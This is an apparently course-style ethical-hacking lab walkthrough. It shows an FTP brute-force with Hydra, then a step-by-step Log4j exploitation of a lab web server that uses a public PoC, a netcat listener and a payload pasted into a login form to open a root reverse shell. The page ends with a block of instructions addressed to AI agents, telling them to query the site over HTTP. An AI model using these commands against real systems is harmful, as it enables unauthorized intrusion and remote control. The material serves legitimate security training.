# 2. Perform Webserver attacks

## 1. Crack FTP credentials using Hydra

```
Hydra -L users.txt -P passwords.txt ftp://192.168.18.2
```

{% embed url="<https://youtu.be/1tBbmUNyJoU>" %}

## 2. Gain Access to Target Web Server by Exploiting Log4j Vulnerability <a href="#task-2-gain-access-to-target-web-server-by-exploiting-log4j-vulnerability" id="task-2-gain-access-to-target-web-server-by-exploiting-log4j-vulnerability"></a>

### Install Docker&#x20;

```
sudo apt-get update
sudo apt-get install docker.io 
```

### Build the docker Image

```
docker build -t log4j-shell-poc 
```

> **-t**: specifies allocating a pseudo-tty.<br>

<figure><img src="/files/Mpi018j8LBceM6MMIJGv" alt=""><figcaption></figcaption></figure>

### Start the vulnerable server

```
docker run --network host log4j-shell-poc
```

<figure><img src="/files/bVApIRVq0eqRaBXIzaCs" alt=""><figcaption></figcaption></figure>

### Exploitation

Scan the IP

```
nmap -sV -sC 10.10.1.9
```

<figure><img src="/files/Ru8Pkdh3zCtvZHYFFcee" alt=""><figcaption></figcaption></figure>

1. From the result we can see that port **8080** is open and **Apache Tomcat/Coyote 1.1** server is running on the target system.
2. Upon investigation we can see that Apache is vulnerable to Remote Code Execution (RCE) attack. Now we wil use searchsploit to find the vulnerabilities pertaining to RCE attack on the target server.
3. In the terminal window run **searchsploit -t Apache RCE** command to view the RCE vulnerabilities on the Apache server.

   ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/xi4z1ucr.jpg)
4. Now, we need to select a vulnerability to exploit the Server from the list, from the Nmap scan we found that the Apache Tomcat server is running on JSP so we will target java vulnerabilities from the list of vulnerabilities.
5. We can see that Java platform is vulnerable for **Apache Log4j 2 - Remote Command Execution (RCE)** exploit.

   ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/v5ecobsb.jpg)
6. We will now exploit Log4j vulnerability present in the target Web Server to perform Remote code execution.
7. Click the **Firefox** icon at the top of **Desktop**, to open a browser window.
8. In the address bar of the browser, type **<http://10.10.1.9:8080>** and press **Enter**.

   ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/2ahufq2p.jpg)
9. As we can observe that the Log4j vulnerable server is running on the **Ubuntu** machine, leave the **Firefox** and website open.
10. Switch to the Terminal window, run **cd log4j-shell-poc/** and press **Enter**, to enter into log4j-shell-poc directory.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/chl20mob.jpg)
11. Now, we needed to install JDK 8, to do that open a new terminal window and type **sudo su** and press **Enter** to run the programs as a root user.

    > In the **\[sudo] password for attacker** field, type **toor** as a password and press **Enter**.
12. We need to extract JDK zip file which is already placed at **/home/attacker** location.
13. Type **tar -xf jdk-8u202-linux-x64.tar.gz** and press **Enter**, to extract the file.

    > **-xf**: specifies extract all files.
14. Now we will move the **jdk1.8.0\_202** into **/usr/bin/**. To do that, type **mv jdk1.8.0\_202 /usr/bin/** and press **Enter**.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/1qsxhwek.jpg)
15. Now, we need to update the installed JDK path in the **poc.py** file.
16. Navigate to the previous terminal window. In the terminal, type **pluma poc.py** and press **Enter** to open **poc.py** file.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/hxicowut.jpg)
17. In the poc.py file scroll down and in line **62**, replace **jdk1.8.0\_20/bin/javac** with **/usr/bin/jdk1.8.0\_202/bin/javac**.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/ydcroaeb.jpg)
18. Scroll down to line **87** and replace **jdk1.8.0\_20/bin/java** with **/usr/bin/jdk1.8.0\_202/bin/java**.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/csfg3ry0.jpg)
19. Scroll down to line **99** and replace **jdk1.8.0\_20/bin/java** with **/usr/bin/jdk1.8.0\_202/bin/java**.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/aeoo24sn.jpg)
20. After making all the changes **save** the changes and close the **poc.py** editor window.
21. Now, open a new terminal window and type **nc -lvp 9001** and press **Enter**, to initiate a netcat listener as shown in screenshot.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/mbpaboet.jpg)
22. Switch to previous terminal window and type **python3 poc.py --userip 10.10.1.13 --webport 8000 --lport 9001** and press **Enter**, to start the exploitation and create payload.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/0h5avehw.jpg)
23. Now, copy the payload generated in the **send me**: section.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/bbnvnq3f.jpg)
24. Switch to **Firefox** browser window, in **Username** field paste the payload that was copied in previous step and in **Password** field type **password** and press **Login** button as shown in the screenshot.

    > In the **Password** field you can enter any password.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/b4whxnfp.jpg)
25. Now switch to the netcat listener, you can see that a reverse shell is opened.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/ynsg0jrp.jpg)
26. In the listener window type **pwd** and press **Enter**, to view the present working directory.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/uuftr5ii.jpg)
27. Now, type **whoami** and press **Enter**.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/1mhkqs3e.jpg)
28. We can see that we have shell access to the target web application as a root user.
29. The Log4j vulnerability takes the payload as input and processes it, as a result we will obtain a reverse shell.

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ceh-practical.cavementech.com/module-13.-hacking-web-servers/2.-perform-webserver-attacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.